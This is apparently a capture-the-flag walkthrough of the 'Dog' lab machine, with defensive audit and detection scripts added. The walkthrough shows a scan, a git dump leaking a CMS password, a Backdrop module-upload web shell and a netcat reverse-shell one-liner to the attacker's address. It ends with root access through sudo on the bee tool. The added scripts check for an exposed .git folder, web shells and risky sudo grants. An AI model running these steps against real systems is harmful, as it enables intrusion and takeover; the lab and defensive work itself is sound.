Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 09 Mar 2025
IP: 10.10.11.58

Enumeration & Initial Access

Nmap Scan Result

PORT   STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| ssh-rsa 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
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
| 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open Ports: 22, 80

  • 22 – SSH

  • 80 – Backdrop CMS 1

After some reconnaissance, I identified that the web server is running Backdrop CMS 1, which is known to have a Remote Code Execution (RCE) vulnerability. A relevant exploit is available here:
🔗 Exploit-DB 52021

However, the exploit requires valid credentials.


.git Folder Discovery

Further enumeration revealed that the .git folder was accessible—something typically not meant to be public. This was discovered via the Nmap scan.

To dump the repository, I used git-dumper:

git-dumper http://10.10.11.58/.git/ ./dumped-repo
╰─❯ git-dumper http://10.10.11.58/.git .
Warning: Destination '.' is not empty
[-] Testing http://10.10.11.58/.git/HEAD [200]
[-] Testing http://10.10.11.58/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.11.58/.gitignore [404]
[-] http://10.10.11.58/.gitignore responded with status code 404
[-] Fetching http://10.10.11.58/.git/ [200]
[-] Fetching http://10.10.11.58/.git/objects/ff/f99b60388f8dabaa3ccb41a86ac100b29a75fa [200]
[-] Running git checkout .
Updated 2873 paths from the index

╰─❯ ls
core/ files/ index.php* layouts/ LICENSE.txt* README.md* robots.txt* settings.php* sites/ themes/

Inside the dumped repository, I found sensitive credentials.

Credentials Found

  • Password (in settings.php):
    BackDropJ2024DS2024

  • Usernames (in update.settings.json):

    • tiffany@dog.htb

    • dog@dog.htb
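
Seen from the server side, both findings can be caught before deployment. The script below is an added example, not part of the original write-up: it walks a document root for version-control metadata and for settings files with an inline database password. The `scheme://user:password@host` format and the function names are assumptions, and the sample tree is constructed.

```sh
#!/bin/sh
# Added example (not from the original write-up): audit a served document root
# for the two exposures described above. Output, one finding per line:
#   VCS_EXPOSED <dir>     version-control metadata inside the served tree
#   CRED_IN_FILE <file>   settings file holding scheme://user:password@host

audit_docroot() {
  root=$1
  # Anything under the docroot is downloadable unless the server denies it,
  # so a .git/.svn/.hg directory there hands out full source and history.
  find "$root" -type d \( -name .git -o -name .svn -o -name .hg \) -prune -print |
    sed 's/^/VCS_EXPOSED /'
  # Assumed credential format: a database URL with an inline password.
  find "$root" -type d -name .git -prune -o \
       -type f -name 'settings*.php' \
       -exec grep -lE "(mysql|pgsql)://[^:/@'\"]+:[^@'\"]+@" {} + |
    sed 's/^/CRED_IN_FILE /'
}

# Constructed sample tree: a CMS checkout deployed together with its .git
# directory and a settings.php carrying a made-up database password.
make_demo_docroot() {
  d=$(mktemp -d) || return 1
  mkdir -p "$d/.git" "$d/core"
  echo 'ref: refs/heads/master' > "$d/.git/HEAD"
  printf '%s\n' '<?php' \
    "\$database = 'mysql://cms_user:Constructed-Pw-1@127.0.0.1/cms';" \
    > "$d/settings.php"
  echo "$d"
}

demo=$(make_demo_docroot)
audit_docroot "$demo"
rm -rf "$demo"
```

A `VCS_EXPOSED` finding is closed by deploying from an export without the metadata directory or by denying the path in the web server (for Apache, `RedirectMatch 404 /\.git`); a `CRED_IN_FILE` finding means the password should be rotated and never reused for OS accounts.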

After trying the credentials, I confirmed that the valid login was:
➡️ Username: tiffany
➡️ Password: BackDropJ2024DS2024

User Flag

Download the exploit: https://www.exploit-db.com/exploits/52021

╰─❯ python3 52021.py http://10.10.11.58/
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/?q=admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

Compress the generated files into a tar.gz archive:

╰─❯ tar -czvf shell1.tar.gz shell/
shell/
shell/shell.info
shell/shell.php

Using the credentials, I authenticated and manually uploaded the malicious module archive (shell1.tar.gz) via: http://10.10.11.58/?q=admin/installer/manual


After successful upload, I accessed the web shell: http://10.10.11.58/modules/shell/shell.php?cmd=id


I then started a Netcat listener to catch the reverse shell:

curl 'http://10.10.11.58/modules/shell/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xxx 1234 >/tmp/f'
╰─❯ nc -lvvnkp 1234
listening on [any] 1234 ...
connect to [10.10.xxx.xxx] from (UNKNOWN) [10.10.11.58] 37612
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

www-data@dog:/var/www/html/modules/shell$ ls /home
ls /home
jobert johncusack
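
The manual module upload and the requests to the uploaded PHP file leave a distinctive trail in the web server's access log. The detection below is an added example, not part of the original write-up: it assumes Apache combined log format, uses constructed log lines, and its function names and finding labels are hypothetical.

```sh
#!/bin/sh
# Added example (not from the original write-up): flag the request pattern
# from this walkthrough in an Apache combined-format access log.

detect_module_webshell() {
  awk '
    { ip = $1; method = substr($6, 2); uri = $7 }

    # Manual module installation through the two admin paths named above.
    method == "POST" && $9 < 400 &&
    uri ~ "[?&]q=admin/(installer/manual|modules/install)" {
      installer[ip] = 1
      print "MANUAL_INSTALL " ip
      next
    }

    # A PHP file inside /modules/ requested directly with a query string.
    uri ~ "^/modules/[^/]+/[^/?]+[.]php[?]" {
      sev = (ip in installer) ? "WEBSHELL_LIKELY" : "MODULE_PHP_QUERY"
      print sev " " ip " " uri
    }
  ' "$@"
}

# Constructed log lines (documentation address ranges, made-up timestamps).
sample_log() {
  cat <<'EOF'
198.51.100.7 - - [09/Mar/2025:10:01:02 +0000] "GET /?q=user/login HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Mar/2025:10:03:40 +0000] "POST /?q=admin/installer/manual HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Mar/2025:10:04:05 +0000] "GET /modules/shell/shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
192.0.2.10 - - [09/Mar/2025:10:05:11 +0000] "GET /modules/gallery/gallery.css HTTP/1.1" 200 901 "-" "Mozilla/5.0"
192.0.2.44 - - [09/Mar/2025:10:06:37 +0000] "GET /modules/gallery/export.php?id=3 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
EOF
}

sample_log | detect_module_webshell
```

Pass a real log path as an argument instead of piping the sample; `MODULE_PHP_QUERY` alone is a lead to review, while `WEBSHELL_LIKELY` ties the request to a client that installed a module by hand earlier in the same log.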

With the shell, I found a local user: johncusack, and tested the credentials we found earlier.

╰─❯ ssh johncusack@10.10.11.58
The authenticity of host '10.10.11.58 (10.10.11.58)' can't be established.
ED25519 key fingerprint is SHA256:M3A+wMdtWP0tBPvp9OcRf6sPPmPmjfgNphodr912r1o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.58' (ED25519) to the list of known hosts.
johncusack@10.10.11.58's password:

johncusack@dog:~$ cat user.txt
d158489555d5e3de8cc87xxxxxxxxxxxx

✅ Logged in successfully and obtained the user flag.

Root flag

Next, I noticed that johncusack could run the bee binary with sudo:

johncusack@dog:/var/www/html$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee

Reference: Backdrop Bee Tool

The bee tool provides multiple ways to escalate privileges. I used the MySQL configuration method to gain a root shell.


johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee sql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 14503
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> \! /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
83eee20657fc895f4f0exxxxxxxxxxxxxxxx

And finally…
🎉 Got the root flag!
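
The root step works because the sudo rule names a program that can open a shell from inside itself and places no limit on its arguments. The review script below is an added example, not part of the original write-up: it reads `sudo -l` output and reports such grants. The watch list, function names and finding labels are assumptions, and the second rule in the sample is constructed.

```sh
#!/bin/sh
# Added example (not from the original write-up): review `sudo -l` output for
# grants on programs that can start a shell from inside themselves.
# WATCH is an illustrative list; extend it for the tools on your hosts.
WATCH="bee mysql vi vim less man"

audit_sudo_grants() {
  awk -v watch="$WATCH" '
    BEGIN { n = split(watch, w, " "); for (i = 1; i <= n; i++) risky[w[i]] = 1 }
    /^[ \t]*\(/ {                                   # rule lines: (runas) cmd
      line = $0
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)       # drop the (user : group)
      while (sub(/^[A-Z_]+:[ \t]*/, "", line)) tags++   # drop NOPASSWD: etc.
      ncmd = split(line, cmds, /,[ \t]*/)
      for (c = 1; c <= ncmd; c++) {
        nargs = split(cmds[c], parts, " ")
        nseg = split(parts[1], seg, "/")
        if (!(seg[nseg] in risky)) continue
        # No argument list in the rule means every subcommand is allowed.
        kind = (nargs == 1) ? "SHELL_CAPABLE_ANY_ARGS" : "SHELL_CAPABLE_FIXED_ARGS"
        print kind " " cmds[c]
      }
    }
  ' "$@"
}

# Rule lines as shown in the write-up (Defaults abridged), plus one
# constructed benign rule.
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
EOF
}

sample_sudo_l | audit_sudo_grants
```

A grant reported as `SHELL_CAPABLE_ANY_ARGS` should be removed or replaced with a narrowly scoped wrapper that performs only the one task the user needs.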